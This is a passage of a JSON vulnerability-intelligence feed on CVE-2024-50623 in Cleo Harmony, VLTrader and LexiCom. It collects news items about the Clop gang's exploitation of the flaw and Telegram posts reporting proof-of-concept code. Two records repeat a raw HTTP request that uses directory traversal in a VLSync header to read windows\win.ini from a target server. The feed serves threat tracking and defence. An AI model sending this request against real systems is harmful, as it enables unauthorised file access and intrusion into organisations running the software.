\u043b\u0438\u0448\u044c \u0442\u0435 \u0436\u0435\u0440\u0442\u0432\u044b, \u0441 \u043a\u043e\u0442\u043e\u0440\u044b\u043c\u0438 \u0441\u0432\u044f\u0437\u0430\u043b\u0438\u0441\u044c, \u043d\u043e \u043e\u0431\u0440\u0430\u0442\u043d\u043e\u0439 \u0441\u0432\u044f\u0437\u0438 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043e \u043d\u0435 \u0431\u044b\u043b\u043e, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u0442\u044c \u043e \u0431\u043e\u043b\u0435\u0435 \u0448\u0438\u0440\u043e\u043a\u043e\u043c \u043e\u0445\u0432\u0430\u0442\u0435 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u0441 \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0435\u0439 Cleo.\n\n\u0412\u043e\u043e\u0431\u0449\u0435 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u044f\u044f \u0430\u0442\u0430\u043a\u0430 \u0441\u0442\u0430\u043b\u0430 \u0435\u0449\u0435 \u043e\u0434\u043d\u0438\u043c \u043a\u0440\u0443\u043f\u043d\u044b\u043c \u043f\u0440\u043e\u0435\u043a\u0442\u043e\u043c Clop, \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0432 \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0439 \u0440\u0430\u0437 \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u0443\u043c\u0435\u043b\u043e \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430\u0442\u044c\u0441\u044f 0-day \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u0445 Cleo LexiCom, VLTransfer \u0438 Harmony \u0434\u043b\u044f \u043c\u0430\u0441\u0441\u043e\u0432\u043e\u0439 \u043a\u0440\u0430\u0436\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 \u0438\u0437 \u0441\u0435\u0442\u0435\u0439 \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u044b\u0445 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439.\n\n\u0422\u0435\u043f\u0435\u0440\u044c \u0432 \u043f\u043e\u0441\u043b\u0443\u0436\u043d\u043e\u043c \u0441\u043f\u0438\u0441\u043a\u0435 \u0445\u0430\u043a\u0435\u0440\u043e\u0432 \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u043d\u0443\u043b\u0438 \u0432 \u041f\u041e: Accellion FTA,\u00a0GoAnywhere MFT\u00a0\u0438\u00a0MOVEit Transfer, \u0430 \u0442\u0430\u043a\u0436\u0435 SolarWinds Serv-U FTP.\n\n\u041f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u043d\u0443\u043b\u044c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a CVE-2024-50623 \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043d\u0435\u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u043d\u0443\u044e \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0438 \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u043d\u0438\u0435 \u0444\u0430\u0439\u043b\u043e\u0432, \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a RCE.\n\n\u041f\u0440\u0438\u0447\u0435\u043c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0431\u044b\u043b\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e \u0434\u043b\u044f Cleo Harmony, VLTrader \u0438 LexiCom \u0432\u0435\u0440\u0441\u0438\u0438 5.8.0.21, \u0430 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u044c \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b \u0432 \u043f\u0440\u0438\u0432\u0430\u0442\u043d\u044b\u0445 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f\u0445 \u0441\u0432\u043e\u044e \u043a\u043b\u0438\u0435\u043d\u0442\u0443\u0440\u0443 \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u0445\u0430\u043a\u0435\u0440\u044b \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u044d\u0442\u043e\u0442 0-day \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445.\n\n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e,\u00a0Huntress \u0434\u0430\u0436\u0435 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e \u0440\u0430\u0441\u043a\u0440\u044b\u043b\u0430, \u0447\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0430\u0441\u044c, \u0438 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0430 \u043e \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u043e\u0431\u0445\u043e\u0434\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a\u0430.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0442\u0430\u043a\u0436\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u043b\u0438 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0439 PoC, \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u0432 \u0432\u0441\u0435 \u0441\u0432\u043e\u0438 \u0432\u044b\u0432\u043e\u0434\u044b.\n\n\u041d\u043e \u043e\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0430\u0442\u0430\u043a\u0438 \u0442\u0430\u043a \u0438 \u043d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c.\n\n\u041d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0434\u043d\u0435\u0439 \u0441\u043f\u0443\u0441\u0442\u044f \u0431\u0430\u043d\u0434\u0430 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0435\u0439 Clop \u0443\u0436\u0435 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u043b\u0430, \u0447\u0442\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2024-50623 \u0442\u0435\u043f\u0435\u0440\u044c \u043d\u0430 \u0435\u0435 \u0441\u0447\u0435\u0442\u0443.\n\n\u0422\u043e\u0433\u0434\u0430 \u0436\u0435 Clop \u043f\u043e\u0447\u0438\u0441\u0442\u0438\u043b\u0430 \u0434\u0430\u043d\u043d\u044b\u0435 \u0441 DLS \u043f\u043e \u0441\u0432\u043e\u0438\u043c \u043f\u0440\u043e\u0448\u043b\u044b\u043c \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f\u043c, \u043e\u0441\u0442\u0430\u0432\u0438\u0432 \u043c\u0435\u0441\u0442\u043e \u0434\u043b\u044f \u043d\u043e\u0432\u043e\u0439, \u043a\u0443\u0434\u0430 \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u043f\u043e\u043c\u0435\u0441\u0442\u0438\u043b\u0438 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 Cleo.\n\n\u041f\u043e\u043a\u0430 \u0435\u0449\u0435 \u043d\u0435 \u0432\u0441\u0435\u0445, \u043d\u043e \u0435\u0441\u043b\u0438 \u0443\u0447\u0435\u0441\u0442\u044c, \u0447\u0442\u043e \u041f\u041e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0431\u043e\u043b\u0435\u0435 4000 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443 - \u0441\u043f\u0438\u0441\u043e\u043a \u0431\u0443\u0434\u0435\u0442 \u043f\u043e\u043f\u043e\u043b\u043d\u044f\u0442\u0441\u044f.\n\n\u0411\u0443\u0434\u0435\u043c \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c.", "creation_timestamp": "2024-12-25T13:00:06.000000Z"}, {"uuid": "8c60f0da-1afa-4101-ad5d-d401627404ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "exploited", "source": "https://t.me/thehackernews/6016", "content": "A critical vulnerability (CVE-2024-50623) in Cleo's file transfer software is under active, widespread exploitation\u2014affecting fully patched systems. \n \nThe flaw allows unauthenticated remote code execution through unrestricted file uploads, enabling attackers to execute arbitrary code. \n \nOver 4,200 organizations use Cleo software globally\u2014this is a major security concern for logistics, consumer products, and more. \n \nGet critical insights: https://thehackernews.com/2024/12/cleo-file-transfer-vulnerability-under.html", "creation_timestamp": "2024-12-10T17:04:30.000000Z"}, {"uuid": "39953f61-31c9-4650-b7c6-20c073b96f7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/9433", "content": "Cleo Harmony, VLTrader, and LexiCom - RCE via Arbitrary File Write (CVE-2024-50623)\n\nhttps://labs.watchtowr.com/cleo-cve-2024-50623/", "creation_timestamp": "2024-12-12T11:56:54.000000Z"}, {"uuid": "dd1c172d-ba9c-4c5a-bb54-a6682bcb9c76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "https://t.me/CyberBulletin/26772", "content": "\u26a1\ufe0fModular Java Backdoor Emerges in Cleo Exploitation Campaign (CVE-2024-50623) \n\n#CyberBulletin", "creation_timestamp": "2024-12-13T12:45:07.000000Z"}, {"uuid": "f8d938de-2fd8-408d-80bd-c803a89a6710", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "published-proof-of-concept", "source": "https://t.me/ckeArsenal/320", "content": "CVE-2024-50623\n\nGET /Synchronization HTTP/1.1\nHost: {{Host}}\n\nVLSync: Retrieve;l=Ab1234-RQ0258;n=VLTrader;v=5.7.0.0;a=192.168.1.100;po=5080;s=True;b=False;pp=myEncryptedPassphrase;path=..\\..\\..\\windows\\win.ini\n\nContent-Type: multipart/form-data; boundary=---------------------------12345678901234567890123456\n\nContent-Length: 0\n\n#exploit #poc", "creation_timestamp": "2025-01-08T16:02:50.000000Z"}, {"uuid": "8d05d2c2-e5cb-4a79-b7db-b1b2d12dc93e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "published-proof-of-concept", "source": "https://t.me/haj3imad/311", "content": "CVE-2024-50623\n\nGET /Synchronization HTTP/1.1\nHost: {{Host}}\n\nVLSync: Retrieve;l=Ab1234-RQ0258;n=VLTrader;v=5.7.0.0;a=192.168.1.100;po=5080;s=True;b=False;pp=myEncryptedPassphrase;path=..\\..\\..\\windows\\win.ini\n\nContent-Type: multipart/form-data; boundary=---------------------------12345678901234567890123456\n\nContent-Length: 0\n\n#exploit #poc", "creation_timestamp": "2025-01-08T16:04:40.000000Z"}, {"uuid": "df3f442d-bc37-416e-a4e5-4b3b882e5d02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "exploited", "source": "https://t.me/club31337/3147", "content": "https://www.rapid7.com/blog/post/2024/12/10/etr-widespread-exploitation-of-cleo-file-transfer-software-cve-2024-50623/\n\n@club31337", "creation_timestamp": "2025-01-03T10:21:04.000000Z"}]}